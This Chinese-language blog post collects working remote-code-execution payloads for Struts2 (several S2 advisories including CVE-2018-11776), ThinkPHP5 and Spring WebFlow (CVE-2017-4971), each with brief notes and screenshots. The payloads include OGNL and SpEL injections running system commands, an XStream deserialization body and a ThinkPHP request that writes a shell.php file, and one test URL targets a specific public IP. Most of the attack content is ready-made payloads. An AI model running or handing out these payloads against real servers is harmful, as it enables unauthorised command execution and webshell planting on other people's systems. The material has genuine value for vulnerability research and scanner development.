<!DOCTYPE html>





<html class="theme-next muse use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="generator" content="Hexo 3.7.1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    save_scroll: false,
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="cve框架漏洞复现和实现自动化扫描器以下是对一些cve框架漏洞的复现，后面我为他们编写了一个简单的实现cve漏洞扫描的工具，本人已经将其上传到github： https://github.com/GD008/gdscan">
<meta property="og:type" content="article">
<meta property="og:title" content="cve框架漏洞复现和实现自动化扫描器">
<meta property="og:url" content="http://GD.com/2019/08/07/tools/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="cve框架漏洞复现和实现自动化扫描器以下是对一些cve框架漏洞的复现，后面我为他们编写了一个简单的实现cve漏洞扫描的工具，本人已经将其上传到github： https://github.com/GD008/gdscan">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565430670645.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565430737565.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565431731405.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565432809355.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565432838218.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565433510739.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565433557594.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565433653549.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565433913490.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565446359573.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565446588146.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565447187126.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565447887629.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565449631883.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/1565449699298.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565449734126.png">
<meta property="og:image" content="http://gd.com/2019/08/07/tools/1565449937127.png">
<meta property="og:updated_time" content="2019-08-15T04:57:37.496Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="cve框架漏洞复现和实现自动化扫描器">
<meta name="twitter:description" content="cve框架漏洞复现和实现自动化扫描器以下是对一些cve框架漏洞的复现，后面我为他们编写了一个简单的实现cve漏洞扫描的工具，本人已经将其上传到github： https://github.com/GD008/gdscan">
<meta name="twitter:image" content="http://gd.com/2019/08/07/tools/1565430670645.png">
  <link rel="canonical" href="http://GD.com/2019/08/07/tools/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>cve框架漏洞复现和实现自动化扫描器 | Hexo</title>
  








  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  <div class="container sidebar-position-left">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://GD.com/2019/08/07/tools/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="GD">
      <meta itemprop="description" content="a GOOD pwner">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">cve框架漏洞复现和实现自动化扫描器

            
          </h1>
        

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2019-08-07 11:36:01" itemprop="dateCreated datePublished" datetime="2019-08-07T11:36:01+08:00">2019-08-07</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-08-15 12:57:37" itemprop="dateModified" datetime="2019-08-15T12:57:37+08:00">2019-08-15</time>
              </span>
            
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="cve框架漏洞复现和实现自动化扫描器"><a href="#cve框架漏洞复现和实现自动化扫描器" class="headerlink" title="cve框架漏洞复现和实现自动化扫描器"></a>cve框架漏洞复现和实现自动化扫描器</h1><p>以下是对一些cve框架漏洞的复现，后面我为他们编写了一个简单的实现cve漏洞扫描的工具，本人已经将其上传到github：</p>
<p><a href="https://github.com/GD008/gdscan" target="_blank" rel="noopener">https://github.com/GD008/gdscan</a></p>
<a id="more"></a>
<h1 id="Struts2-S2-057远程执行代码漏洞（CVE-2018-11776）"><a href="#Struts2-S2-057远程执行代码漏洞（CVE-2018-11776）" class="headerlink" title="Struts2 S2-057远程执行代码漏洞（CVE-2018-11776）"></a>Struts2 S2-057远程执行代码漏洞（CVE-2018-11776）</h1><p>受影响的版本：&lt;= Struts 2.3.34，Struts 2.5.16</p>
<p>S2-057需要以下条件：</p>
<p>  - <code>alwaysSelectFullNamespace</code>为true - action元素没有设置namespace属性，或者使用了通配符</p>
<p>命名空间将由用户从uri传递并解析为OGNL表达式，最终导致远程代码执行漏洞。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://139.196.143.238:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565430670645.png" alt="1565430670645"></p>
<p>payload:</p>
<p>%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27id%27)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7d/actionChain1.action</p>
<p><img src="/2019/08/07/tools/1565430737565.png" alt="1565430737565"></p>
<h1 id="S2-053远程执行代码漏洞"><a href="#S2-053远程执行代码漏洞" class="headerlink" title="S2-053远程执行代码漏洞"></a>S2-053远程执行代码漏洞</h1><p>受影响的版本：Struts 2.0.1 - Struts 2.3.33，Struts 2.5 - Struts 2.5.10</p>
<p>Struts2允许在使用Freemarker模板引擎时解析OGNL表达式。OGNL本身不解析数据，但Freemarker解析后一次。它成为一个表达式并由OGNL第二次解析。并且远程代码执行漏洞。</p>
<p>payload:</p>
<p>%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0D%0A</p>
<p><img src="/2019/08/07/tools/1565431731405.png" alt="1565431731405"></p>
<h1 id="S2-052远程执行代码漏洞"><a href="#S2-052远程执行代码漏洞" class="headerlink" title="S2-052远程执行代码漏洞"></a>S2-052远程执行代码漏洞</h1><p>影响版本：Struts 2.1.2 - Struts 2.3.33，Struts 2.5 - Struts 2.5.12</p>
<p>Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件，其根据Content-Type或URI扩展名来判断用户传入的数据包类型</p>
<p>由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法，所以我们只需要修改orders.xhtml为orders.xml或修改Content-Type头为application/xml，即可在Body中传递XML数据。</p>
<p>patload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;map&gt; &lt;entry&gt; &lt;jdk.nashorn.internal.objects.NativeString&gt; &lt;flags&gt;0&lt;/flags&gt; &lt;value class=&quot;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&quot;&gt; &lt;dataHandler&gt; &lt;dataSource class=&quot;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&quot;&gt; &lt;is class=&quot;javax.crypto.CipherInputStream&quot;&gt; &lt;cipher class=&quot;javax.crypto.NullCipher&quot;&gt; &lt;initialized&gt;false&lt;/initialized&gt; &lt;opmode&gt;0&lt;/opmode&gt; &lt;serviceIterator class=&quot;javax.imageio.spi.FilterIterator&quot;&gt; &lt;iter class=&quot;javax.imageio.spi.FilterIterator&quot;&gt; &lt;iter class=&quot;java.util.Collections$EmptyIterator&quot;/&gt; &lt;next class=&quot;java.lang.ProcessBuilder&quot;&gt; &lt;command&gt; &lt;string&gt;whoami&lt;/string&gt;&lt;/command&gt; &lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt; &lt;/next&gt; &lt;/iter&gt; &lt;filter class=&quot;javax.imageio.ImageIO$ContainsFilter&quot;&gt; &lt;method&gt; &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt; &lt;name&gt;start&lt;/name&gt; &lt;parameter-types/&gt; &lt;/method&gt; &lt;name&gt;foo&lt;/name&gt; &lt;/filter&gt; &lt;next class=&quot;string&quot;&gt;foo&lt;/next&gt; &lt;/serviceIterator&gt; &lt;lock/&gt; &lt;/cipher&gt; &lt;input class=&quot;java.lang.ProcessBuilder$NullInputStream&quot;/&gt; &lt;ibuffer&gt;&lt;/ibuffer&gt; &lt;done&gt;false&lt;/done&gt; &lt;ostart&gt;0&lt;/ostart&gt; &lt;ofinish&gt;0&lt;/ofinish&gt; &lt;closed&gt;false&lt;/closed&gt; &lt;/is&gt; &lt;consumed&gt;false&lt;/consumed&gt; &lt;/dataSource&gt; &lt;transferFlavors/&gt; &lt;/dataHandler&gt; &lt;dataLen&gt;0&lt;/dataLen&gt; &lt;/value&gt; &lt;/jdk.nashorn.internal.objects.NativeString&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=&quot;../jdk.nashorn.internal.objects.NativeString&quot;/&gt; &lt;/entry&gt; &lt;entry&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=&quot;../../entry/jdk.nashorn.internal.objects.NativeString&quot;/&gt; &lt;jdk.nashorn.internal.objects.NativeString reference=&quot;../../entry/jdk.nashorn.internal.objects.NativeString&quot;/&gt; &lt;/entry&gt; &lt;/map&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565432809355.png" alt="1565432809355"></p>
<p>点击GO后会执行 touch /tmp/success</p>
<p><img src="/2019/08/07/tools/1565432838218.png" alt="1565432838218"></p>
<h1 id="S2-048远程执行代码漏洞"><a href="#S2-048远程执行代码漏洞" class="headerlink" title="S2-048远程执行代码漏洞"></a>S2-048远程执行代码漏洞</h1><p>受影响的版本：2.0.0 - 2.3.32</p>
<p>Gangster Name 输入<code>${233*233}</code></p>
<p><img src="/2019/08/07/tools/1565433510739.png" alt="1565433510739"></p>
<p><img src="/2019/08/07/tools/1565433557594.png" alt="1565433557594"></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565433653549.png" alt="1565433653549"></p>
<h1 id="S2-016远程执行代码漏洞"><a href="#S2-016远程执行代码漏洞" class="headerlink" title="S2-016远程执行代码漏洞"></a>S2-016远程执行代码漏洞</h1><p>受影响的版本：2.0.0 - 2.3.15</p>
<p>在struts2中，DefaultActionMapper类支持以”action:”、”redirect:”、”redirectAction:”作为导航或是重定向前缀，但是这些前缀后面同时可以跟OGNL表达式，由于struts2没有对这些前缀做过滤，导致利用OGNL表达式调用java静态方法执行任意系统命令。</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?redirect%3a%24%7b%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27)%2c%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27)%2c%23resp.setCharacterEncoding(%27UTF-8%27)%2c%23ot%3d%23resp.getWriter+()%2c%23ot.print(%27web%27)%2c%23ot.print(%27path%3a%27)%2c%23ot.print(%23req.getSession().getServletContext().getRealPath(%27%2f%27))%2c%23ot.flush()%2c%23ot.close()%7d</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565433913490.png" alt="1565433913490"></p>
<h1 id="S2-015远程代码执行漏洞"><a href="#S2-015远程代码执行漏洞" class="headerlink" title="S2-015远程代码执行漏洞"></a>S2-015远程代码执行漏洞</h1><p>影响版本：2.0.0 - 2.3.14.2</p>
<p>漏洞产生于配置了Action通配符*，并将其作为动态值时，解析时会将其内容执行OGNL表达式</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/%24%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution%27%5d%3dfalse%2c%23m%3d%23_memberAccess.getClass().getDeclaredField(%27allowStaticMethodAccess%27)%2c%23m.setAccessible(true)%2c%23m.set(%23_memberAccess%2ctrue)%2c%23q%3d%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream())%2c%23q%7d.action</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565446359573.png" alt="1565446359573"></p>
<h1 id="S2-013-S2-014远程代码执行漏洞"><a href="#S2-013-S2-014远程代码执行漏洞" class="headerlink" title="S2-013 / S2-014远程代码执行漏洞"></a>S2-013 / S2-014远程代码执行漏洞</h1><p>影响版本：2.0.0 - 2.3.14.1</p>
<p>Struts2标签中<code>&lt;s:a&gt;</code>和<code>&lt;s:url&gt;</code>都包含一个includeParams属性，其值可设置为none，get或all，参考官方其对应意义如下：</p>
<ol>
<li>none - 链接不包含请求的任意参数值（默认）</li>
<li>get - 链接只包含GET请求中的参数和其值</li>
<li>all - 链接包含GET和POST所有参数和其值</li>
</ol>
<p><code>&lt;s:a&gt;</code>用来显示一个超链接，当<code>includeParams=all</code>的时候，会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染，造成任意命令执行漏洞。</p>
<p>任意命令执行POC：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(&apos;id&apos;).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(&apos;dbapp%3D&apos;%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565446588146.png" alt="1565446588146"></p>
<h1 id="ThinkPHP5-5-0-23远程代码执行漏洞"><a href="#ThinkPHP5-5-0-23远程代码执行漏洞" class="headerlink" title="ThinkPHP5 5.0.23远程代码执行漏洞"></a>ThinkPHP5 5.0.23远程代码执行漏洞</h1><p>ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取方法的方法中没有正确处理方法名，导致攻击者可以调用请求类任意方法并构造利用链，从而导致远程代码执行漏洞。</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_method=__construct&amp;filter[]=system&amp;method=get&amp;get[REQUEST_METHOD]=id</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565447187126.png" alt="1565447187126"></p>
<h1 id="ThinkPHP5-5-0-22-5-1-29远程代码执行漏洞"><a href="#ThinkPHP5-5-0-22-5-1-29远程代码执行漏洞" class="headerlink" title="ThinkPHP5 5.0.22 / 5.1.29远程代码执行漏洞"></a>ThinkPHP5 5.0.22 / 5.1.29远程代码执行漏洞</h1><p>ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下），可以执行任意方法，从而导致远程命令执行漏洞。</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?s=/Index/%5cthink%5capp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=id</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?s=/Index/%5cthink%5capp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=-1</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?s=index/%5cthink%5ctemplate%5cdriver%5cfile/write?cacheFile=shell.php&amp;content=&lt;?php%20phpinfo();?&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565447887629.png" alt="1565447887629"></p>
<h1 id="Spring-WebFlow远程代码执行漏洞（CVE-2017-4971）"><a href="#Spring-WebFlow远程代码执行漏洞（CVE-2017-4971）" class="headerlink" title="Spring WebFlow远程代码执行漏洞（CVE-2017-4971）"></a>Spring WebFlow远程代码执行漏洞（CVE-2017-4971）</h1><p>Spring WebFlow是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其2.4.x版本中，如果我们控制了数据绑定时的字段，将导致一个使用SpEL表达式注入漏洞，最终造成任意命令执行。</p>
<p>登录</p>
<p><img src="/2019/08/07/tools/1565449631883.png" alt="1565449631883"></p>
<p><img src="/2019/08/07/tools/C:/Users\Administrator\AppData\Roaming\Typora\typora-user-images\1565449699298.png" alt="1565449699298"></p>
<p><img src="/2019/08/07/tools/1565449734126.png" alt="1565449734126"></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader(&quot;vulnerable&quot;,&quot;True&quot;).aaa=test</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/07/tools/1565449937127.png" alt="1565449937127"></p>

    </div>

    
    
    
        
      

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2019/08/03/biji/" rel="next" title="src漏洞挖掘和绕过姿势">
                  <i class="fa fa-chevron-left"></i> src漏洞挖掘和绕过姿势
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/08/15/shentou/" rel="prev" title="看我如何用structs2漏洞渗透日本的内网">
                  看我如何用structs2漏洞渗透日本的内网 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">GD</p>
  <div class="site-description motion-element" itemprop="description">a GOOD pwner</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
  </nav>



        </div>
      </div>
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#cve框架漏洞复现和实现自动化扫描器"><span class="nav-number">1.</span> <span class="nav-text">cve框架漏洞复现和实现自动化扫描器</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Struts2-S2-057远程执行代码漏洞（CVE-2018-11776）"><span class="nav-number">2.</span> <span class="nav-text">Struts2 S2-057远程执行代码漏洞（CVE-2018-11776）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-053远程执行代码漏洞"><span class="nav-number">3.</span> <span class="nav-text">S2-053远程执行代码漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-052远程执行代码漏洞"><span class="nav-number">4.</span> <span class="nav-text">S2-052远程执行代码漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-048远程执行代码漏洞"><span class="nav-number">5.</span> <span class="nav-text">S2-048远程执行代码漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-016远程执行代码漏洞"><span class="nav-number">6.</span> <span class="nav-text">S2-016远程执行代码漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-015远程代码执行漏洞"><span class="nav-number">7.</span> <span class="nav-text">S2-015远程代码执行漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#S2-013-S2-014远程代码执行漏洞"><span class="nav-number">8.</span> <span class="nav-text">S2-013 / S2-014远程代码执行漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ThinkPHP5-5-0-23远程代码执行漏洞"><span class="nav-number">9.</span> <span class="nav-text">ThinkPHP5 5.0.23远程代码执行漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ThinkPHP5-5-0-22-5-1-29远程代码执行漏洞"><span class="nav-number">10.</span> <span class="nav-text">ThinkPHP5 5.0.22 / 5.1.29远程代码执行漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Spring-WebFlow远程代码执行漏洞（CVE-2017-4971）"><span class="nav-number">11.</span> <span class="nav-text">Spring WebFlow远程代码执行漏洞（CVE-2017-4971）</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GD</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.7.1</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.3.0</div>

        








        
      </div>
    </footer>
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
      </div>

    

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

<script src="/js/utils.js?v=7.3.0"></script>
  <script src="/js/motion.js?v=7.3.0"></script>


  <script src="/js/schemes/muse.js?v=7.3.0"></script>


